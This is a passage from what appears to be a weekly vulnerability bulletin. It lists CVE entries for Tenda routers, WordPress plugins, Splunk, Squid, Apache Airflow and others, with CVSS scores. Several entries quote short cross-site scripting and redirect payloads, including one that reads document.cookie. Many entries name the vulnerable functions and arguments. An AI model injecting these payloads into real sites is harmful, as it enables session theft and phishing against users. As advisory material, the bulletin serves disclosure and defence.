splunk — splunk_enterprise | In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit. | 2024-01-22 | 4.6 | CVE-2024-23676 [email protected] [email protected] |
splunk — splunk_enterprise | In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file. | 2024-01-22 | 4.3 | CVE-2024-23677 [email protected] |
squid-cache — squid | Squid is a caching proxy for the Web. Due to an expired pointer reference bug, Squid prior to version 6.6 is vulnerable to a Denial of Service attack against Cache Manager error responses. This problem allows a trusted client to perform Denial of Service when generating error pages for Client Manager reports. Squid older than 5.0.5 have not been tested and should be assumed to be vulnerable. All Squid-5.x up to and including 5.9 are vulnerable. All Squid-6.x up to and including 6.5 are vulnerable. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid’s patch archives. As a workaround, prevent access to Cache Manager using Squid’s main access control: `http_access deny manager`. | 2024-01-24 | 6.5 | CVE-2024-23638 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
stanfordvl — gibsonenv | A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibson\utils\pposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204. | 2024-01-27 | 5 | CVE-2024-0959 [email protected] [email protected] [email protected] [email protected] |
strangebee — thehive | StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator. | 2024-01-19 | 5.4 | CVE-2024-22876 [email protected] |
strangebee — thehive | StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened. | 2024-01-19 | 5.4 | CVE-2024-22877 [email protected] |
swftools — swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service. | 2024-01-19 | 5.5 | CVE-2024-22914 [email protected] |
swftools — swftools | swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190. | 2024-01-19 | 5.5 | CVE-2024-22957 [email protected] |
synaptics — synaptics_fingerprint_driver | Use of encryption key derived from static information in Synaptics Fingerprint Driver allows an attacker to set up a TLS session with the fingerprint sensor and send restricted commands to the fingerprint sensor. This may allow an attacker, who has physical access to the sensor, to enroll a fingerprint into the template database. | 2024-01-27 | 5.2 | CVE-2023-6482 [email protected] |
synology — diskstation_manager_(dsm) | URL redirection to untrusted site (‘Open Redirect’) vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors. | 2024-01-24 | 4.1 | CVE-2024-0854 [email protected] |
tenda — ac10u | A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0922 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0923 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0924 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0925 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0926 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0927 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0928 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0929 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0930 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0931 [email protected] [email protected] [email protected] |
tenda — ac10u | A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 4.7 | CVE-2024-0932 [email protected] [email protected] [email protected] |
the_notary_project — the_notary_project | The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry. | 2024-01-19 | 4 | CVE-2024-23332 [email protected] [email protected] |
themegrill — colormag | The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. | 2024-01-20 | 6.5 | CVE-2024-0679 [email protected] [email protected] [email protected] |
thomas_maier — image_source_control_lite-show_image_credits_and_captions | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Thomas Maier Image Source Control Lite – Show Image Credits and Captions. This issue affects Image Source Control Lite – Show Image Credits and Captions: from n/a through 2.17.0. | 2024-01-27 | 5.3 | CVE-2023-52187 [email protected] |
tongda — oa_2017 | A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 5.5 | CVE-2024-0938 [email protected] [email protected] [email protected] |
trillium-rs — trillium | Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert “\r\n” sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values. Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.) In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed. | 2024-01-24 | 6.8 | CVE-2024-23644 [email protected] [email protected] [email protected] |
tutao — tutanota | Tuta is an encrypted email service. In versions prior to 119.10, an attacker can attach an image in a html mail which is loaded from external resource in the default setting, which should prevent loading of external resources. When displaying emails containing external content, they should be loaded by default only after confirmation by the user. However, it could be recognized that certain embedded images (see PoC) are loaded, even though the “Automatic Reloading of Images” function is disabled by default. The reloading is also done unencrypted via HTTP and redirections are followed. This behavior is unexpected for the user, since the user assumes that external content will only be loaded after explicit manual confirmation. The loading of external content in e-mails represents a risk, because this makes the sender aware that the e-mail address is used, when the e-mail was read, which device is used and expose the user’s IP address. Version 119.10 contains a patch for this issue. | 2024-01-23 | 5.3 | CVE-2024-23330 [email protected] |
unix4lyfe — darkhttpd | darkhttpd through 1.15 allows local users to discover credentials (for –auth) by listing processes and their arguments. | 2024-01-22 | 5.5 | CVE-2024-23770 [email protected] [email protected] [email protected] |
van_der_schaar_lab — synthcity | A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. | 2024-01-26 | 6.3 | CVE-2024-0937 [email protected] [email protected] [email protected] [email protected] |
van_der_schaar_lab — temporai | A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024. | 2024-01-26 | 6.3 | CVE-2024-0936 [email protected] [email protected] [email protected] [email protected] |
vektor-inc — vk_block_patterns | The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-20 | 4.3 | CVE-2024-0623 [email protected] [email protected] |
wordpress — wordpress | The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed | 2024-01-22 | 4.8 | CVE-2023-6290 [email protected] |
wordpress — wordpress | The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-24 | 6.1 | CVE-2023-6697 [email protected] [email protected] |
wordpress — wordpress | The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘disqus_name’ parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-23 | 6.1 | CVE-2024-0587 [email protected] [email protected] |
wordpress — wordpress | The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-01-24 | 6.1 | CVE-2024-0665 [email protected] [email protected] [email protected] |
wordpress — wordpress | The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information. | 2024-01-27 | 6.5 | CVE-2024-0697 [email protected] [email protected] |
wordpress — wordpress | The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-27 | 6.4 | CVE-2024-0824 [email protected] [email protected] |
wordpress — wordpress | The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue. | 2024-01-25 | 5.3 | CVE-2024-0617 [email protected] [email protected] [email protected] |
wordpress — wordpress | The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-25 | 5.3 | CVE-2024-0624 [email protected] [email protected] [email protected] |
wordpress — wordpress | The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the ‘execute’ function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the ‘BoosterController’ class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-01-27 | 5.4 | CVE-2024-0667 [email protected] [email protected] [email protected] |
wordpress — wordpress | The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2023-6497 [email protected] [email protected] |
wordpress — wordpress | The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2024-0618 [email protected] [email protected] [email protected] |
wordpress — wordpress | The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-25 | 4.4 | CVE-2024-0625 [email protected] [email protected] [email protected] |
wordpress — wordpress | The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-27 | 4.4 | CVE-2024-0664 [email protected] [email protected] |
wordpress — wordpress | The “WebSub (FKA. PubSubHubbub)” plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-01-25 | 4.4 | CVE-2024-0688 [email protected] [email protected] |
wordpress — wordpress | The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-01-23 | 4.4 | CVE-2024-0703 [email protected] [email protected] |
wp-eventmanager — user_profile_avatar | The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar | 2024-01-22 | 4.3 | CVE-2023-6384 [email protected] |
wpmet — wp_social_login_and_register_social_counter | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0. | 2024-01-19 | 6.5 | CVE-2022-47160 [email protected] |
yugeshverma — student_project_allocation_system | A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. | 2024-01-19 | 6.1 | CVE-2024-0726 [email protected] [email protected] [email protected] |
zulip — zulip | Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams. | 2024-01-25 | 4.3 | CVE-2024-21630 [email protected] [email protected] [email protected] [email protected] [email protected] |
Low Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
changedetection — changedetection | changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result, any unauthorized user can check one’s watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users’ data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 3.7 | CVE-2024-23329 [email protected] [email protected] |
codeastro — internet_banking_system | A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input <meta http-equiv=”refresh” content=”0; url=https://vuldb.com” /> leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability. | 2024-01-22 | 3.5 | CVE-2024-0781 [email protected] [email protected] [email protected] |
codeastro — online_railway_reservation_system | A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. | 2024-01-22 | 3.5 | CVE-2024-0782 [email protected] [email protected] [email protected] |
codeastro — stock_management_system | A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203. | 2024-01-27 | 3.5 | CVE-2024-0958 [email protected] [email protected] [email protected] |
dell — unity | Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise logs integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities. | 2024-01-24 | 3.1 | CVE-2024-22229 [email protected] |
hongmaple — octopus | A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input <script>alert(document.cookie)</script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043. | 2024-01-25 | 3.5 | CVE-2024-0891 [email protected] [email protected] [email protected] |
lenovo — tab_m8_hd_tb8505f_firmware | An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier. | 2024-01-19 | 3.3 | CVE-2023-5081 [email protected] |
linzhaoguan — pb-cms | A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input <div onmouseenter=”alert(“xss)”> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability. | 2024-01-22 | 3.5 | CVE-2024-0776 [email protected] [email protected] [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-01-26 | 3.3 | CVE-2024-21383 [email protected] |
microsoft — microsoft_edge_(chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-01-26 | 2.5 | CVE-2024-21336 [email protected] |
netbox — netbox | A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <<h1 onload=alert(1)>>test</h1> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 2.4 | CVE-2024-0948 [email protected] [email protected] [email protected] |
poikosoft — ez_cd_audio_converter | A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability. | 2024-01-25 | 3.3 | CVE-2024-0886 [email protected] [email protected] [email protected] |
smp7,wp.insider — simple_membership | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in smp7, wp.Insider Simple Membership. This issue affects Simple Membership: from n/a through 4.4.1. | 2024-01-24 | 3.4 | CVE-2024-22308 [email protected] |
totolink — n200re_v5 | A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0942 [email protected] [email protected] [email protected] [email protected] |
totolink — n350rt | A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0943 [email protected] [email protected] [email protected] |
totolink — t8 | A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 3.7 | CVE-2024-0944 [email protected] [email protected] [email protected] |
Severity Not Yet Assigned
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
angel_coffee — mini-app_line | An issue in angel coffee mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48133 [email protected] |
anglersnet_co._ltd. — access_analysis_cgi_an-analyzer | Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL. | 2024-01-22 | not yet calculated | CVE-2024-22113 [email protected] [email protected] |
apache_software_foundation — apache_airflow | Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of “enable_xcom_pickling=False” configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-50943 [email protected] [email protected] [email protected] |
apache_software_foundation — apache_airflow | Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don’t have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-50944 [email protected] [email protected] [email protected] |
apache_software_foundation — apache_airflow_cncf_kubernetes_provider | Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue. | 2024-01-24 | not yet calculated | CVE-2023-51702 [email protected] [email protected] [email protected] [email protected] [email protected] |
